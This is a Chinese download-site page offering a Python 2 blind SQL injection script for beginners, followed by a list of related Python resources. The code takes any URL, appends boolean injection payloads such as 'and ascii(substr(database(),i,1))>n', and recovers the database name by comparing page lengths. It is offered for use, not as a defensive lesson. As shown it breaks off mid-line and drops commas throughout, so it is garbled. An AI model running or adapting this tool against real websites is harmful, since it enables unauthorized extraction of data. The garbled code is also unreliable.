资源简介
适合刚学python和sql注入的人
import urllib2
import re
代码片段和文件信息
# -*-coding:gbk-*-
import urllib2
import re
url=raw_input(“网址:“)
def getpage(url):
req = urllib2.Request(url)
res = urllib2.urlopen(req)
page = res.read()
return len(page)
sureLen = getpage(url)
def getdblen(urlsureLen):
i = 0
while 1:
i = i + 1
lenurl = url + “+and+length(database())=“ + str(i) + “+--+“
pageLen = getpage(lenurl)
if sureLen == pageLen:
return i
dblen = getdblen(urlsureLen)
print “dbname length is :“dblen
ls = “aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!‘#$%&‘()*+-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_‘abcdefghijklmnopqrstuvwxyz{|}~“
def getdbname(urllssureLendblen):
dbName = ““
for i in range(1dblen+1):
j = 96
k = 128
fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
print fullUrl
pageLen = getpage(fullUrl)
if sureLen == pageLen:
j = 111
fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
print fullUrl
pageLen = getpage(fullUrl)
if sureLen == pageLen:
j = 119
fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
print fullUrl
pageLen = getpage(fullUrl)
if sureLen == pageLen:
j = 123
fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
print fullUrl
pageLen = getpage(fullUrl)
if sureLen == pageLen:
j = 125
fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
print fullUrl
pageLen = getpage(fullUrl)
if sureLen == pageLen:
for u in range(126127):
fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))=“+str(u)+“--+“
print fullUrl
pageLen = getpage(fullUrl)
if sureLen == pageLen:
dbName += ls[u]
break
else:
for u in range(124126):
fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))=“+str(u)+“--+“
print fullUrl
pageLen = getpage(fullUrl)
if sureLen == pageLen:
dbName += ls[u]
break
else:
j = 121
fullUrl=url + “+and+ascii(substr(database()“
- 上一篇:python基础代码大全
- 下一篇:kmeans实现iris数据集分类
相关资源
- python实现SGBM图像匹配算法
- python实现灰度直方图均衡化
- scrapy_qunar_one
- Python学习全系列教程永久可用
- python简明教程.chm
- 抽奖大转盘python的图形化界面
- 双边滤波器实验报告及代码python
- python +MYSQL+HTML实现21蛋糕网上商城
- Python-直播答题助手自动检测出题搜索
- OpenCV入门教程+OpenCV官方教程中文版
- Python 串口工具源码+.exe文件
- Python开发的全栈股票系统.zip
- Python操作Excel表格并将其中部分数据写
- python书籍 PDF
- 利用python绘制散点图
- python+labview+No1.vi
- 老男孩python项目实战
- python源码制作whl文件.rar
- python3.5可用的scipy
- PYTHON3 经典50案例.pptx
- 计算机科学导论-python.pdf
- python模拟鼠标点击屏幕
- windows鼠标自动点击py脚本
- 鱼c小甲鱼零基础学python全套课后题和
- Python 练习题100道
- Practical Programming 2nd Edition
- wxPython Application Development Cookbook
- python 3.6
- Python 3.5.2 中文文档 互联网唯一CHM版本
- python3.5.2.chm官方文档
评论
共有 条评论